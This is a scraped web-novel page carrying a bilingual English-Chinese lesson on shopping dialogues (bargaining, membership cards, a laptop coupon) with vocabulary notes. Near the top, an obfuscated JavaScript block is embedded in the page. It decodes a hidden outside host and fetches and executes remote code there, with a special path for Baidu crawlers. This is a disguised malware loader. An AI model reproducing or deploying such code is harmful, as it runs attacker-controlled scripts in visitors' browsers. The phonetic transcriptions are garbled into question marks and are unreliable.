妙书阁小说

阅读记录  |   用户书架
上一页
目录 | 设置
下一章
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};

02 购物过程(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

lucy: ok, i&#039;ll buy them even if the bargain doesn&#039;t work.

露西:好吧,就是价钱没砍下来我也要买。

notes

1. mansion [?m?n??n] n. 宅第;公馆;大厦

2. boot [bu:t] n. 长筒靴,高筒鞋

3. quality [?kw?liti] n. 质,质量;优点,优质;品质,特征,特性

4. judge [d??d?] n. 法官;裁判员,评判员;鉴定人;v. 审判;评判,断定

5. warranty [?w?r?nti] n. 质量,保证;保证书,保单

小贴士

1. the shoes in this shop are much cheaper than the one that we went just now.

这家店里的鞋比刚才我们去的那家要便宜得多。

2. the trousers don&#039;t suit me well. let&#039;s try another shop.

这条裤子不太适合我。我们去别家看看吧。

3. i like this pair of earrings best after scanning so many kinds.

看了这么多种耳环,我最喜欢的就是这副了。

4. what do you think of this handbag compared with the previous one?

和之前的那个手包相比,你觉得这个怎么样?

5. don&#039;t hurry to buy that now. it would be better to decide after a comparison.

现在不要着急去买。做个比较后再决定会更好。

6. i don&#039;t think this style fits me well, although it is cheaper.

我觉得这个风格不太适合我,虽然它更便宜一些。

会员卡消费挺划算

dialogue

april is in a store, and she wants to buy a pair of jeans.

艾普丽尔在一家服装店,她想买一条牛仔裤。

april: how much is this pair of jeans?

艾普丽尔:这条牛仔裤多少钱?

seller: 210 yuan. do you have a membership card, madam?

店员:210元。请问女士有会员卡吗?

april: no, i don&#039;t. how can i get one?

艾普丽尔:我没有。怎么办会员卡?

seller: if you consume more than 200 yuan once, you can get a membership card here. next time when you come here to buy something, you will enjoy a discount of 20%.

店员:如果您一次消费满200元的话,就可以办理一张会员卡。下次您来这里消费的时候,就会享受8折优惠。

april: that&#039;s good. well, i think i can get one now, right?

艾普丽尔:挺不错。那我现在可以办一张了吧?

seller: sure, could you register and sign your name here?

店员:当然,请登记一下,然后签个字好吗?

april: is it ok?

艾普丽尔:这样可以吗?

seller: yes, here&#039;s your card, please.

店员:是的,这是您的卡。

april: thank you.

艾普丽尔:谢谢。

notes

1. membership [?memb??ip] n. 会员身份,会员资格;全体会员

2. consume [k?n?sju:m] v. 消费;消耗,耗尽

3. once [w?ns] adv. 一次;曾经,昔时;conj. 一旦……就……

小贴士

1. membership card 会员卡

会员制服务是现在流行的一种服务管理模式,它可以提高顾客的回头率,提高顾客对企业的忠诚度。很多的服务行业都采取这样的服务模式,会员制的形式多数都表现为会员卡。一个公司发行的会员卡相当于公司的名片,在会员卡上可以印刷公司的标志或者图案,为公司形象作宣传,是公司进行广告宣传的理想载体。同时发行会员卡还能起到吸引新顾客,留住老顾客,增强顾客忠诚度的作用,并能实现打折、积分、客户管理等功能,是一种确实可行的增加效益的途径。

2. please help me check the points that have accumulated in my membership card.

请帮我查一下我会员卡里的积分。

3. how can i apply for a membership card in your store?

我怎么样才能办一张你们店里的会员卡?

4. the more points in your card, the more discounts you will enjoy.

会员卡里的积分越多,您享受到的折扣就越多。

5. i forget to take my card today. can i still enjoy the discount? for i&#039;m an old customer here.

我今天忘带会员卡了,还可以享受折扣吗?我是这里的老顾客了。

6. you will enjoy a discount of 20% with your card.

下次您来这里消费的时候,就会享受8折优惠。

(enjoy a discount of 20%指享受8折优惠,8折优惠就是打原价20%的折扣,不说enjoy a discount of 80%。)

优惠券,大优惠

dialogue

kane wants to buy a laptop and now he is bargaining with the seller.

凯恩想买台笔记本电脑,现在他正在和店员讨价还价。

kane: this laptop is overpriced. i want to buy it if there&#039;s a cheaper price.

凯恩:这台笔记本太贵了。再便宜一点吧。

seller: sorry, sir. we never overcharge. it is a fair price as a new type in this brand.

店家:对不起,先生。我们从不漫天要价。对于这种牌子的新品来说,价格相当公道。

kane: is there any discount on this laptop now?

凯恩:这台电脑现在有折扣吗?

seller: no, sir. how about the lenovo series? there&#039;s a promotion of lenovo. it&#039;s on sale now.

店家:没有,先生。联想系列的怎么样?联想品牌在搞促销,现在降价出售。

kane: how much of this silver grey one?

凯恩:这台银灰色的什么价位?

seller: what a great taste you have! it&#039;s 3500 yuan. this laptop is excellent. also you&#039;ll enjoy a coupon for the promotion.

店家:您真有品味。这台是3500元。这台笔记本相当出色,而且现在在搞促销,您还会享受一张优惠券。

kane: how long is the warranty?

凯恩:保修期是多长时间?

seller: one year. the maintenance store location and telephone numbers are on the warranty card.

店家:一年。保修卡上有维修地点和电话。

kane: ok, i&#039;ll take this one.

凯恩:好的,就要这台了。

notes

1. overprice [??uv??prais] v. 将……标价过高,索价过高

2. overcharge [??uv??t?ɑ:d?] v. 对……要价过高;n. 过高的要价

3. silver [?silv?] n. 银;adj. 银色的,银制的;像银的

4. coupon [?ku:p?n] n. 礼券,优惠券订货单;参赛表

小贴士

1. this coupon is just valid during the promotion.

这张优惠券仅在促销活动期间有效。

2. are there any coupons available in the market?

商场有推出优惠券吗?

3. the coupon is a great chance for me to buy that toy bear.

这张优惠券正好可以用来买那只玩具熊。

4. the coupons are very popular now as a way of attracting customers.

优惠券作为一种吸引顾客的方式,现在非常流行。

5. i got a coupon of kfc today. let&#039;s enjoy the fast food when we finish our work.

我今天得到了一张肯德基的优惠券。我们完成工作后去享受快餐吧。

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间